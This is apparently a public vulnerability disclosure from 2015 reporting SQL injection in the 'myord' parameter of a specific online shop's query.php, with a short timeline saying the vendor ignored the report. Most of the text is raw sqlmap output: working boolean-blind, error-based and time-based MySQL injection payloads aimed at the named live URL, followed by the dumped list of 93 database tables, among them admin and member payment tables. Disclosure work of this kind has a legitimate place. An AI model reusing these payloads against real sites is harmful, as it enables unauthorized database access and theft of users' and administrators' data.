2015-08-10: Details reported to the vendor; awaiting vendor response
2015-08-15: The vendor chose to ignore the vulnerability; details disclosed to the public
http://zzjz2.edong.com/webmall/query.php?catid=0&imageField=&key=1&myord=1&typeid=0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: myord
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: catid=0&imageField=&key=1&myord=1 RLIKE (SELECT (CASE WHEN (4263=4263) THEN 1 ELSE 0x28 END))&typeid=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: catid=0&imageField=&key=1&myord=1 AND (SELECT 1655 FROM(SELECT COUNT(*),CONCAT(0x7168676a71,(SELECT (CASE WHEN (1655=1655) THEN 1 ELSE 0 END)),0x7169636a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&typeid=0

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: catid=0&imageField=&key=1&myord=1 AND SLEEP(5)&typeid=0
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: zzjz2phpweb
[93 tables]
+--------------------------+
| pwn_advs_duilian         |
| pwn_advs_lb              |
| pwn_advs_lbgroup         |
| pwn_advs_link            |
| pwn_advs_linkgroup       |
| pwn_advs_logo            |
| pwn_advs_movi            |
| pwn_advs_pic             |
| pwn_advs_pop             |
| pwn_advs_text            |
| pwn_base_admin           |
| pwn_base_adminauth       |
| pwn_base_adminmenu       |
| pwn_base_adminrights     |
| pwn_base_border          |
| pwn_base_coltype         |
| pwn_base_config          |
| pwn_base_pageset         |
| pwn_base_pagetemp        |
| pwn_base_plus            |
| pwn_base_plusdefault     |
| pwn_base_plusplan        |
| pwn_base_plusplanid      |
| pwn_base_plustemp        |
| pwn_base_version         |
| pwn_comment              |
| pwn_comment_cat          |
| pwn_comment_config       |
| pwn_down_cat             |
| pwn_down_con             |
| pwn_down_config          |
| pwn_down_downlog         |
| pwn_down_pages           |
| pwn_down_pcat            |
| pwn_down_proj            |
| pwn_down_prop            |
| pwn_maq                  |
| pwn_maq_cat              |
| pwn_maq_config           |
| pwn_member               |
| pwn_member_buylist       |
| pwn_member_cat           |
| pwn_member_centlog       |
| pwn_member_centrule      |
| pwn_member_centset       |
| pwn_member_config        |
| pwn_member_defaultrights |
| pwn_member_fav           |
| pwn_member_friends       |
| pwn_member_group         |
| pwn_member_msn           |
| pwn_member_notice        |
| pwn_member_nums          |
| pwn_member_onlinepay     |
| pwn_member_pay           |
| pwn_member_paycenter     |
| pwn_member_regstep       |
| pwn_member_rights        |
| pwn_member_secure        |
| pwn_member_type          |
| pwn_member_zone          |
| pwn_menu                 |
| pwn_menu_group           |
| pwn_news_cat             |
| pwn_news_con             |
| pwn_news_config          |
| pwn_news_downlog         |
| pwn_news_pages           |
| pwn_news_pcat            |
| pwn_news_proj            |
| pwn_news_prop            |
| pwn_page                 |
| pwn_page_group           |
| pwn_tools_code           |
| pwn_tools_photopolldata  |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig     |
| pwn_tools_polldata       |
| pwn_tools_pollindex      |
| pwn_tools_statbase       |
| pwn_tools_statcome       |
| pwn_tools_statcount      |
| pwn_tools_statdate       |
| pwn_webmall_config       |
| pwn_webmall_goods        |
| pwn_webmall_iorder       |
| pwn_webmall_modules      |
| pwn_webmall_spool        |
| pwn_webmall_spoolmod     |
| pwn_webmall_tempcat      |
| pwn_webmall_temptype     |
| pwn_webmall_tmod         |
| pwn_webmall_torder       |
+--------------------------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-08-15 11:18
Vulnerability Rank: 4 (WooYun rating)
None yet